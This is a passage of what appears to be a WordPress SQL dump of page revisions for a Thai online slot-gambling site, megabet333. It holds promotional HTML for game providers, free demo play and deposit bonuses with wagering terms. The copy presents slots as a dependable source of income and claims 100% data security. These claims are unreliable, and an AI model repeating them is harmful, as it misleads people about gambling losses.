หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:42:01','2025-10-23 08:42:01','',44,'https://megabet333.biz/?p=149',0,'revision','',0),(150,3,'2025-10-23 12:40:31','2025-10-23 12:40:31','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 12:40:31','2025-10-23 12:40:31','',16,'https://megabet333.biz/?p=150',0,'revision','',0),(151,3,'2025-10-23 12:40:31','2025-10-23 12:40:31','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"#\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"#\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 12:40:31','2025-10-23 12:40:31','',16,'https://megabet333.biz/?p=151',0,'revision','',0),(152,3,'2025-10-23 12:40:31','2025-10-23 12:40:31','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://amb18b.com/demoslot/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 12:40:31','2025-10-23 12:40:31','',16,'https://megabet333.biz/?p=152',0,'revision','',0),(153,3,'2025-10-23 12:46:01','2025-10-23 12:46:01','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" 